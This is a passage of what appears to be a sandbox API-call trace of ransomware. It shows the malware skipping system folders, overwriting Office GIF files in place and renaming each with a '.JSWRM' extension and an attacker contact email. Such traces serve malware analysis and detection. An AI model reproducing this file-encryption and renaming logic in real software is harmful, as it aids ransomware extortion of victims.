0x23d140 [0119.710] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2474b8 [0119.710] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d140 | out: hHeap=0x1e0000) returned 1 [0119.710] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0119.710] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR48B.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir48b.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR48B.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir48b.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0119.714] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2474b8 | out: hHeap=0x1e0000) returned 1 [0119.714] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cf48 | out: hHeap=0x1e0000) returned 1 [0119.714] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cd50 | out: hHeap=0x1e0000) returned 1 [0119.714] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xadb15e3, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xadb15e3, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xadb15e3, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x178c, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="PDIR48F.GIF", cAlternateFileName="")) returned 1 [0119.714] lstrcmpiW (lpString1="PDIR48F.GIF", lpString2=".") returned 1 [0119.714] lstrcmpiW (lpString1="PDIR48F.GIF", lpString2="..") returned 1 [0119.714] lstrcmpiW (lpString1="PDIR48F.GIF", lpString2="...") returned 1 [0119.714] lstrcmpiW (lpString1="PDIR48F.GIF", lpString2="windows") returned -1 [0119.714] lstrcmpiW (lpString1="PDIR48F.GIF", lpString2="recovery") returned -1 [0119.714] lstrcmpiW (lpString1="PDIR48F.GIF", lpString2="perflogs") returned -1 [0119.714] lstrcmpiW (lpString1="PDIR48F.GIF", lpString2="documents and settings") returned 1 [0119.714] lstrcmpiW (lpString1="PDIR48F.GIF", lpString2="$RECYCLE.BIN") returned 1 [0119.714] lstrcmpiW (lpString1="PDIR48F.GIF", lpString2="system volume information") returned -1 [0119.714] lstrcmpiW (lpString1="PDIR48F.GIF", lpString2="msocache") returned 1 [0119.714] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0119.714] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR48F.GIF", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0119.714] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR48F.GIF", cchWideChar=11, lpMultiByteStr=0x345e870, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PDIR48F.GIF", lpUsedDefaultChar=0x0) returned 11 [0119.714] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0119.714] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f20 [0119.714] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR48F.GIF", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0119.714] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR48F.GIF", cchWideChar=11, lpMultiByteStr=0x345e840, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PDIR48F.GIF", lpUsedDefaultChar=0x0) returned 11 [0119.714] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f20 | out: hHeap=0x1e0000) returned 1 [0119.714] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d530 [0119.714] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23da70 | out: hHeap=0x1e0000) returned 1 [0119.714] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0119.714] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0119.714] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d3e0 [0119.714] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR48F.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir48f.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0119.715] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=6028) returned 1 [0119.715] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0119.715] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1780) returned 0x24e1d8 [0119.715] ReadFile (in: hFile=0x314, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0x1780, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e534*=0x1780, lpOverlapped=0x0) returned 1 [0119.717] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0119.717] WriteFile (in: hFile=0x314, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0x1780, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e530*=0x1780, lpOverlapped=0x0) returned 1 [0119.717] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1d8 | out: hHeap=0x1e0000) returned 1 [0119.717] CloseHandle (hObject=0x314) returned 1 [0119.717] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d728 [0119.717] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0119.717] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0119.717] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0119.717] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0119.717] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0119.717] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0119.717] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a498 [0119.717] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a498, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0119.717] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a498 | out: hHeap=0x1e0000) returned 1 [0119.717] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d488 [0119.717] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2475b0 [0119.717] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d488 | out: hHeap=0x1e0000) returned 1 [0119.717] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0119.717] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR48F.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir48f.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR48F.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir48f.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0119.718] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2475b0 | out: hHeap=0x1e0000) returned 1 [0119.718] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0119.718] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d3e0 | out: hHeap=0x1e0000) returned 1 [0119.718] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xadb15e3, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xadb15e3, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xadb15e3, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x4a66, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="PDIR49B.GIF", cAlternateFileName="")) returned 1 [0119.719] lstrcmpiW (lpString1="PDIR49B.GIF", lpString2=".") returned 1 [0119.719] lstrcmpiW (lpString1="PDIR49B.GIF", lpString2="..") returned 1 [0119.719] lstrcmpiW (lpString1="PDIR49B.GIF", lpString2="...") returned 1 [0119.719] lstrcmpiW (lpString1="PDIR49B.GIF", lpString2="windows") returned -1 [0119.719] lstrcmpiW (lpString1="PDIR49B.GIF", lpString2="recovery") returned -1 [0119.719] lstrcmpiW (lpString1="PDIR49B.GIF", lpString2="perflogs") returned -1 [0119.719] lstrcmpiW (lpString1="PDIR49B.GIF", lpString2="documents and settings") returned 1 [0119.719] lstrcmpiW (lpString1="PDIR49B.GIF", lpString2="$RECYCLE.BIN") returned 1 [0119.719] lstrcmpiW (lpString1="PDIR49B.GIF", lpString2="system volume information") returned -1 [0119.719] lstrcmpiW (lpString1="PDIR49B.GIF", lpString2="msocache") returned 1 [0119.719] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0119.719] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR49B.GIF", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0119.719] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR49B.GIF", cchWideChar=11, lpMultiByteStr=0x345e870, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PDIR49B.GIF", lpUsedDefaultChar=0x0) returned 11 [0119.719] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0119.719] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f98 [0119.719] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR49B.GIF", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0119.719] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR49B.GIF", cchWideChar=11, lpMultiByteStr=0x345e840, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PDIR49B.GIF", lpUsedDefaultChar=0x0) returned 11 [0119.719] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f98 | out: hHeap=0x1e0000) returned 1 [0119.719] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0119.719] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d530 | out: hHeap=0x1e0000) returned 1 [0119.719] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0119.719] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0119.719] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23db18 [0119.719] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR49B.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir49b.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0119.720] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=19046) returned 1 [0119.720] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0119.720] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x4a60) returned 0x24e1d8 [0119.720] ReadFile (in: hFile=0x314, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0x4a60, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e534*=0x4a60, lpOverlapped=0x0) returned 1 [0119.722] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0119.722] WriteFile (in: hFile=0x314, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0x4a60, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e530*=0x4a60, lpOverlapped=0x0) returned 1 [0119.723] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1d8 | out: hHeap=0x1e0000) returned 1 [0119.723] CloseHandle (hObject=0x314) returned 1 [0119.723] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d728 [0119.723] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0119.723] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0119.723] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0119.723] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0119.723] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0119.723] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0119.723] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a378 [0119.723] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a378, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0119.723] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a378 | out: hHeap=0x1e0000) returned 1 [0119.723] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cff0 [0119.723] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247c78 [0119.723] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cff0 | out: hHeap=0x1e0000) returned 1 [0119.723] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0119.723] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR49B.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir49b.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR49B.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir49b.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0119.724] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247c78 | out: hHeap=0x1e0000) returned 1 [0119.724] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0119.724] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23db18 | out: hHeap=0x1e0000) returned 1 [0119.724] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xadb15e3, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xadb15e3, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xadb15e3, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x32b6, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="PDIR49F.GIF", cAlternateFileName="")) returned 1 [0119.724] lstrcmpiW (lpString1="PDIR49F.GIF", lpString2=".") returned 1 [0119.724] lstrcmpiW (lpString1="PDIR49F.GIF", lpString2="..") returned 1 [0119.724] lstrcmpiW (lpString1="PDIR49F.GIF", lpString2="...") returned 1 [0119.724] lstrcmpiW (lpString1="PDIR49F.GIF", lpString2="windows") returned -1 [0119.724] lstrcmpiW (lpString1="PDIR49F.GIF", lpString2="recovery") returned -1 [0119.724] lstrcmpiW (lpString1="PDIR49F.GIF", lpString2="perflogs") returned -1 [0119.724] lstrcmpiW (lpString1="PDIR49F.GIF", lpString2="documents and settings") returned 1 [0119.724] lstrcmpiW (lpString1="PDIR49F.GIF", lpString2="$RECYCLE.BIN") returned 1 [0119.724] lstrcmpiW (lpString1="PDIR49F.GIF", lpString2="system volume information") returned -1 [0119.724] lstrcmpiW (lpString1="PDIR49F.GIF", lpString2="msocache") returned 1 [0119.724] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0119.724] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR49F.GIF", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0119.724] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR49F.GIF", cchWideChar=11, lpMultiByteStr=0x345e870, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PDIR49F.GIF", lpUsedDefaultChar=0x0) returned 11 [0119.724] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0119.724] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0119.725] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR49F.GIF", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0119.725] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR49F.GIF", cchWideChar=11, lpMultiByteStr=0x345e840, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PDIR49F.GIF", lpUsedDefaultChar=0x0) returned 11 [0119.725] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0119.725] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d728 [0119.725] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0119.725] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0119.725] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0119.725] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cff0 [0119.725] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR49F.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir49f.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0119.725] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=12982) returned 1 [0119.725] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0119.725] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x32b0) returned 0x24e1d8 [0119.725] ReadFile (in: hFile=0x314, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0x32b0, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e534*=0x32b0, lpOverlapped=0x0) returned 1 [0119.765] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0119.765] WriteFile (in: hFile=0x314, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0x32b0, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e530*=0x32b0, lpOverlapped=0x0) returned 1 [0119.765] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1d8 | out: hHeap=0x1e0000) returned 1 [0119.765] CloseHandle (hObject=0x314) returned 1 [0119.765] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d140 [0119.765] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0119.765] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0119.765] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0119.765] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0119.765] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0119.765] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0119.765] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a258 [0119.765] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a258, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0119.766] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a258 | out: hHeap=0x1e0000) returned 1 [0119.766] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cd50 [0119.766] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247a88 [0119.766] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cd50 | out: hHeap=0x1e0000) returned 1 [0119.766] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0119.766] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR49F.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir49f.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR49F.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir49f.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0119.767] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247a88 | out: hHeap=0x1e0000) returned 1 [0119.767] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d140 | out: hHeap=0x1e0000) returned 1 [0119.767] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cff0 | out: hHeap=0x1e0000) returned 1 [0119.767] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xadfda74, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xadfda74, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xadfda74, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2a01, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="PDIR4B.GIF", cAlternateFileName="")) returned 1 [0119.767] lstrcmpiW (lpString1="PDIR4B.GIF", 